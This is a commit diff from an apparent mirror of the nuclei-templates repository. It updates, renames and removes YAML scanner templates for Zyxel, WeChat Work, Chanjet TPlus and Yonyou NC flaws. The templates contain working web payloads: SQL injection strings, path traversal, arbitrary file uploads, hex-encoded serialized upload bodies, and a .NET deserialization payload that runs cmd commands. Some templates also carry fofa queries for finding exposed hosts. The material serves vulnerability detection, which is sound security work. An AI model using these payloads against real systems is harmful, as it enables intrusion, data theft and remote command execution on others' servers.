daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Templates - update

patch-1
pussycat0x 2023-09-15 17:53:57 +05:30
parent 25593b4df3
commit c84e4ef64c
25 changed files with 367 additions and 345 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml → http/cnvd/2021/CNVD-2021-30167.yaml.yaml
View File

0
http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml → http/cnvd/2023/CNVD-C-2023-76801.yaml
View File

33
http/cves/2022/CVE-2022-0342.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2022-0342
info:
name: Zyxel - Authentication Bypass
author: SleepingBag945
severity: critical
description: |
An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
metadata:
max-request: 1
fofa-query: app="ZyXEL-USG-FLEX"
verified: true
tags: cve,cve2022,zyxel,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf"
matchers-condition: and
matchers:
- type: word
words:
- "interface-name"
- type: word
part: header
words:
- "text/zyxel"
- type: status
status:
- 200

14
http/vulnerabilities/wechat/wechat-info-leak.yaml
View File

@ -1,20 +1,24 @@
id: wechat-info-leak
info:
name: wechat-info-leak
name: WeChat agentinfo - Information Exposure
author: SleepingBag945
severity: high
description: |
企业微信信息泄露
There is an information leakage vulnerability in the agentinfo interface of Tencent Enterprise WeChat. An attacker can obtain the Enterprise WeChat Secret through the vulnerability.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/f7869eb69bad66d177a88df4cebfe584691651ce/%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E/%E8%85%BE%E8%AE%AF%20%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%20agentinfo%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
metadata:
tags: wechat
max-request: 1
fofa-query: body="wework_admin.normal_layout"
verified: true
tags: wechat,exposure,tencent
http:
- raw:
- |
GET /cgi-bin/gateway/agentinfo HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
matchers:
@ -22,4 +26,4 @@ http:
dsl:
- status_code_1 == 200 && contains(body_1,"errcode") && contains(body_1,"strcorpid")
- contains(body_1,"corpid")
condition: and
condition: and

29
http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml → http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
View File

@ -1,18 +1,24 @@
id: yonyou-chanjet-remote-gnfunction-sqli
id: chanjet-gnremote-sqli
info:
name: 畅捷通远程通 GNRemote.dll SQL注入漏洞
name: Changjietong Remote Communication GNRemote.dll - SQL Injection
author: SleepingBag945
severity: high
description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞攻击者可利用该漏洞获取数据库敏感信息。
tags: yonyou,changjietong
description: |
Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
reference: |
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 2
fofa-query: body="远程通CHANJET_Remote"
verified: true
tags: yonyou,chanjet,sqli
http:
- raw:
- |
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
@ -21,32 +27,25 @@ http:
- |
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=%22'%20or%201%3d2%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "{\"RetCode\":0}"
part: body_1
condition: and
- type: word
part: body_2
words:
- "{\"RetCode\":2}"
part: body_2
condition: and
- type: status
status:
- 200
# http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
- 200

19
http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml
View File

@ -1,13 +1,17 @@
id: chanjet-tplus-checkmutex-sqli
info:
name: chanjettplus - CheckMutex SQL Injection
name: Chanjet Tplus CheckMutex - SQL Injection
author: unknown
severity: critical
severity: high
description: |
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
reference:
- https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880
- https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: app="畅捷通-TPlus"
verified: true
tags: chanjettplus,sqli
http:
@ -19,8 +23,13 @@ http:
Cookie: ASP.NET_SessionId=; sid=admin
{"accNum": "6'", "functionTag": "SYS0104", "url": ""}
matchers:
- type: word
part: body
words:
- "附近有语法错误"
part: body
- "order by begintime"
- type: status
status:
- 200

33
http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml Executable file
View File

@ -0,0 +1,33 @@
id: chanjet-tplus-file-read
info:
name: Chanjet TPlus DownloadProxy.aspx - Arbitrary File Read
author: SleepingBag945
severity: high
description: |
Chanjet TPlus DownloadProxy.aspx file has an arbitrary file reading vulnerability. An attacker can obtain sensitive files on the server through the vulnerability.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20DownloadProxy.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: app="畅捷通-TPlus"
verified: true
tags: yonyou,chanjet,lfi,tplus
http:
- method: GET
path:
- "{{BaseURL}}/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "xml version"
- "<configuration>"
condition: and
- type: status
status:
- 200

43
http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml Executable file
View File

@ -0,0 +1,43 @@
id: chanjet-tplus-fileupload
info:
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 2
fofa-query: app="畅捷通-TPlus"
verified: true
tags: yonyou,chanjet,upload,intrusive
http:
- raw:
- |
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo
Accept-Encoding: gzip
------WebKitFormBoundaryuirnbcvo
Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg"
Content-Type: image/jpeg
{{randstr_2}}
------WebKitFormBoundaryuirnbcvo--
- |
GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1==200 && status_code_2==200"
- "contains(body_2, '{{randstr_2}}')"
condition: and

67
http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml
View File

@ -1,67 +0,0 @@
id: chanjet-tplus-getstorewarehousebystore_rce
info:
name: 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
author: SleepingBag945
severity: critical
description: |
用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
metadata:
tags: yonyou,chanjet
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: {{Hostname}}
X-Ajaxpro-Method: GetStoreWarehouseByStore
{
"storeID":{}
}
matchers-condition: or
matchers:
- type: word
part: body
words:
- "actorId或archivesId不能为空"
- "\"Type\":\"System.ArgumentException\""
condition: and
- type: word
part: body
words:
- "Object reference not set to an instance of an object"
- "System.NullReferenceException"
condition: and
# EXP
# POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
# Host:
# User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
# Connection: close
# Content-Length: 668
# X-Ajaxpro-Method: GetStoreWarehouseByStore
# Accept-Encoding: gzip
# {
# "storeID":{
# "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
# "MethodName":"Start",
# "ObjectInstance":{
# "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
# "StartInfo":{
# "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
# "FileName":"cmd",
# "Arguments":"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt"
# }
# }
# }
# }

53
http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml Normal file
View File

@ -0,0 +1,53 @@
id: chanjet-tplus-rce
info:
name: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution
author: SleepingBag945
severity: critical
description: |
Changjet Tplus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution.
reference:
- https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
- https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
metadata:
fofa-query: app="畅捷通-TPlus"
verified: true
tags: chanjettplus,rce
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: {{Hostname}}
X-Ajaxpro-Method: GetStoreWarehouseByStore
{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c ping {{interactsh-url}}"
}
}
}
}
matchers-condition: or
matchers:
- type: word
part: body
words:
- "actorId或archivesId不能为空"
- "\"Type\":\"System.ArgumentException\""
- "Object reference not set to an instance of an object"
- "System.NullReferenceException"
condition: or
- type: word
part: interactsh_protocol
words:
- "dns"

20
http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml → http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml
View File

@ -1,24 +1,29 @@
id: yonyou-changjietong-tplus-ufida-sqli
id: chanjet-tplus-ufida-sqli
info:
name: 畅捷通 T+ Ufida.T.SM.Login.UIP SQL注入漏洞
name: Chanjet TPluse Ufida.T.SM.Login.UIP - SQL injection
author: SleepingBag945
severity: high
description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞攻击者可利用该漏洞获取数据库敏感信息。
tags: yonyou,changjietong
description: |
Chanjet TPluse application has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
reference:
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20Plus%20%E5%AE%A1%E8%AE%A1%20%EF%BC%88%E8%B6%85%E8%AF%A6%E7%BB%86%EF%BC%89.md
metadata:
max-request: 1
fofa-query: app="畅捷通-TPlus"
verified: true
tags: yonyou,chanjet,sqli
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
{"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
matchers-condition: and
matchers:
- type: word
@ -31,5 +36,4 @@ http:
- type: status
status:
- 200
- 200

26
http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml → http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml
View File

@ -1,20 +1,24 @@
id: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload
id: grp-u8-uploadfiledata
info:
name: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload
name: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: 用友U8+ERP客户关系管理软件存在文件上传漏洞攻击者可利用该漏洞获取服务器控制权。
description: |
File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
tags: yonyou,upload
- https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag
metadata:
max-request: 2
fofa-query: title="用友GRP-U8行政事业内控管理软件"
verified: true
tags: yonyou,fileupload,grp,intrusive
http:
- raw:
- |
POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1
Host: 60.172.58.9:8010
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Host: {{Hostname}}
Content-Length: 327
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw
@ -34,18 +38,12 @@ http:
- |
GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
condition: and
# 可尝试启动并调用xpcmdshell执行命令
condition: and

40
http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml
View File

@ -1,40 +0,0 @@
id: yonyou-changjietong-tplus-file-upload
info:
name: 畅捷通 T+ 任意文件上传漏洞
author: SleepingBag945
severity: critical
description: 畅捷通 T+ 系列产品存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意文件控制目标服务器。
tags: yonyou,changjietong,upload
http:
- raw:
- |
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo
Accept-Encoding: gzip
------WebKitFormBoundaryuirnbcvo
Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg"
Content-Type: image/jpeg
{{randstr_2}}
------WebKitFormBoundaryuirnbcvo--
- |
GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
- "contains(body_2, '{{randstr_2}}')"
condition: and

29
http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml
View File

@ -1,29 +0,0 @@
id: yonyou-changjietong-tplus-downloadproxy-file-read
info:
name: 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
author: SleepingBag945
severity: medium
description: 用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞攻击者通过漏洞可以获取服务器上的敏感文件
tags: yonyou,changjietong
http:
- raw:
- |
GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "xml version"
- "<configuration>"
part: body
condition: and
- type: status
status:
- 200

30
http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml
View File

@ -1,34 +1,32 @@
id: yonyou-fe-directory-traversal
info:
name: yonyou-fe-directory-traversal
name: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal
author: SleepingBag945
severity: medium
description: 用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞通过漏洞攻击者可以获取目录文件等信息导致进一步攻击
description: |
There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
tags: yonyou
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 2
fofa-query: "FE协作"
verified: true
tags: yonyou,fe,lfi
http:
- raw:
- |
GET /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Cookie: JSESSIONID=31DB4A83640B082DBA62A54ADB04D77C
Accept-Encoding: gzip
- method: GET
path:
- "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../"
matchers-condition: and
matchers:
- type: word
words:
- "window.location=\"templateOfTaohong_manager.jsp?path=\""
- type: word
words:
- "var next=window.confirm(\"确定删除文件吗?\");"
condition: and
- type: status
status:
- 200

24
http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml → http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml
View File

@ -1,20 +1,25 @@
id: yonyou-nc-accept-arbitrary-file-upload
id: yonyou-nc-accept-fileupload
info:
name: yonyou-nc-accept-arbitrary-file-upload
name: YonYou NC Accept Upload - Arbitray File Upload
author: SleepingBag945
severity: critical
description: 用友NC在accept.jsp文件处存在任意文件上传漏洞。
description: |
Arbitrary file upload vulnerability in UFIDA N C accept.jsp . An attacker can obtain website permissions through the vulnerability.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
tags: yonyou
- https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==&chksm=c184c6a1f6f34fb788437557f0e7708c74b16928e5973772db09b12067f10cf28b108701f67a&idx=1&lang=zh_CN&mid=2247488118&sn=16217c422eafc656df5fcacee9aa2153&token=857848930#rd
metadata:
max-request: 2
fofa-query: icon_hash="1085941792"
verified: true
tags: yonyou,nc,intrusive,fileupload
http:
- raw:
- |
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
Accept-Encoding: gzip
@ -33,20 +38,13 @@ http:
- |
GET /{{randstr_3}}.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
condition: and
# 可尝试启动并调用xpcmdshell执行命令
condition: and

24
http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml → http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
View File

@ -1,22 +1,26 @@
id: yonyou-nc-baseapp-uploadservlet-deserialization-rce
id: yonyou-nc-baseapp-deserialization
info:
name: Yonyou NC BaseApp UploadServlet Deserialization RCE
name: Yonyou NC BaseApp UploadServlet - Deserialization Detect
author: SleepingBag945
severity: critical
severity: high
description: |
Yonyou NC is an enterprise-level management software, widely used in large and medium-sized enterprises.Realize modeling, development, inheritance, operation, management integration of IT solution information platform.UFIDA NC for C/S architecture, the use of Java programming language development, the client can directly use UClient, the server interface for HTTP.A page of UFIDA NC6.5, there is arbitrary file upload vulnerability.The cause of vulnerability is that there is no type restriction at the uploading file, and an attacker without authentication can take advantage of this vulnerability by sending special data packets to the target system, and a remote attacker who successfully takes advantage of this vulnerability can upload any file to the target system to execute commands.
tags: rce
reference:
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Yonyou-NC-BaseApp-UploadServlet-Deserialization-RCE.json
metadata:
max-request: 1
fofa-query: app="Yonyou-UFIDA-NC"
verified: true
tags: yonyou,nc,fileupload,baseapp,deserialization
http:
- raw:
- |
GET /service/~baseapp/UploadServlet HTTP/1.1
Host: {{Hostname}}
- method: GET
path:
- "{{BaseURL}}/service/~baseapp/UploadServlet"
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1,"java.io")'
condition: and
condition: and

19
http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml → http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
View File

@ -1,33 +1,36 @@
id: yonyou-nc-dispatcher-servlet-arbitrary-file-upload
id: yonyou-nc-dispatcher-fileupload
info:
name: Yonyou-NC ServiceDispatcherServlet Arbitrary File Upload
name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: Yonyou-NC FileReceiveServlet Arbitrary File Upload
tags: yonyou,nc
description: |
Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability.
reference:
- https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md
metadata:
fofa-query: icon_hash="1085941792"
verified: true
tags: yonyou,nc,intrusive
http:
- raw:
- |
POST /ServiceDispatcherServlet HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
Content-Type: application/data
Host: {{Hostname}}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
{{hex_decode("0000015C7271890390CEA362632F6E8819F73AC2FA807D6CAF41AE772EC2DF10A2AB43A4C7BAF2C7F57909B2C19D6CF5DE6E565331E70CB3C2E70A3AF6D1E3C4480035F870288D440C41742E3EC659DA538CC3CAA2AE86569D62D002D8CE52D7D184BE7556F95C7567C1AC40FDD7502AF38BAE48C14D6A4F473779542BD7D1072973C4CD093C6BC1D0266BE82F15EEB96D146BAF89297059448A2EDDDF63463984FFC2247032EAD18E03422B87A8CC01E651A50DD09A1DE3C87ED376B43366DE024EE3880B7006A56DF97073A7472B444FF53433DD0AE63758FEB43A808B49DA0CB5B23783C3DE07C5182D35CD467D9CA2081B47EB7F604E84A1B7DA7E665A2B5D6B04F94C838AF6AE6E4829304C2D750A0A1400860F9D7611BA8DEA77AE8C79AD44F90C55A74DD3D06D27B5F3A583E8C3FCC27FC8C9B660F0C3B52B76DB7B3A0B87D04FE98DF57D2851FD93F40D04A3DA14C658E5BCBD9DCB74E35AB50818EF")}}
- |
GET /ncupload/n2d19a.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "status_code_2 == 200 && contains(body_2,'just_a_test')"
condition: and
condition: and

33
http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml
View File

@ -1,33 +0,0 @@
id: yonyou-nc-filereceiveservlet-arbitrary-file-upload
info:
name: Yonyou NC FileReceiveServlet Aribitrary File Upload
author: bjxsec
severity: high
tags: yonyou,oa,bjxsec,yonyouoa
description: fofa app="用友-UFIDA-NC" "/platform/yonyou-yyy.js"
variables:
file_name: "{{to_lower(rand_text_alpha(8))}}.jsp"
file_content: "{{to_lower(rand_text_alpha(26))}}"
http:
- raw:
- |
POST /servlet/FileReceiveServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: multipart/form-data;
Referer: https://google.com
{{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}t00ls.jsp{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
- |
GET /t00ls.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(body_2, '{{file_content}}')"
- "status_code_1 == 200 && status_code_2 == 200"
condition: and

41
